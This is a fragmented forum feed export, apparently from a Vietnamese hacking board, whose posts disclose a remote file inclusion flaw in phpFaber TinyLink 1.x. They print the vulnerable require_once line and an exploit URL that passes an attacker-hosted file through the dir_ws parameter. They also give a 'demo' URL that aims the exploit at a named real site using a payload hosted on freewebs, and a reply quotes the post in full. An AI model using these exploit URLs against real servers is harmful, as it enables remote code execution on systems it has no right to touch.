<![CDATA[Latest posts for the topic "phpFaber TinyLink 1.x (vul + exploit)"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net phpFaber TinyLink 1.x (vul + exploit) Product name: phpFaber TinyLink Affected version: 1.x Type: Remote file inclusion (PHP Include) Vendor: phpfaber.com   Cái script này dùng để rút ngắn link lại á, giống như là tinyurl vậy, lỗi coding không kỹ của mấy tay coder, đơn giản nó là lỗi PHP Include hay còn một cái tên gọi là : Remote file inclusion File dính lỗi là : config.php, path đầy đủ là : /tiny_includes/config.php Khai thác :
require_once("$dir_ws/tiny_includes/i_INI.php"); http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?  
Link demo : :D) http://sid.to/tiny_includes/config.php?dir_ws=http://www.freewebs.com/camauonline/root/hht.txt? P/S: Discovered by: black_hat_cr @ VnForce Team]]>
/hvaonline/posts/list/5909.html#34764 /hvaonline/posts/list/5909.html#34764 GMT
Re: phpFaber TinyLink 1.x (vul + exploit) /hvaonline/posts/list/5909.html#34812 /hvaonline/posts/list/5909.html#34812 GMT phpFaber TinyLink 1.x (vul + exploit) /hvaonline/posts/list/5909.html#34893 /hvaonline/posts/list/5909.html#34893 GMT phpFaber TinyLink 1.x (vul + exploit)

hoahongtim wrote:
Cái bug này có lâu rùi, đang ngồi nhâm nhi cafe, sẵn rãnh tay gửi lên cho bà con giải trí cuối tuần luôn vậy !!
Product name: phpFaber TinyLink Affected version: 1.x Type: Remote file inclusion (PHP Include) Vendor: phpfaber.com  
Cái script này dùng để rút ngắn link lại á, giống như là tinyurl vậy, lỗi coding không kỹ của mấy tay coder, đơn giản nó là lỗi PHP Include hay còn một cái tên gọi là : Remote file inclusion File dính lỗi là : config.php, path đầy đủ là : /tiny_includes/config.php Khai thác :
require_once("$dir_ws/tiny_includes/i_INI.php"); http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?  
Link demo : :D) http://sid.to/tiny_includes/config.php?dir_ws=http://www.freewebs.com/camauonline/root/hht.txt?  
à cho hỏi hoahongtim xíu cái này bác lấy ở đâu hay tự tìm ra thế :oops: cái này post lên ở đây lâu rồi : https://hcegroup.vn/forums/showthread.php?t=1444 ]]>
/hvaonline/posts/list/5909.html#34899 /hvaonline/posts/list/5909.html#34899 GMT
phpFaber TinyLink 1.x (vul + exploit) /hvaonline/posts/list/5909.html#34955 /hvaonline/posts/list/5909.html#34955 GMT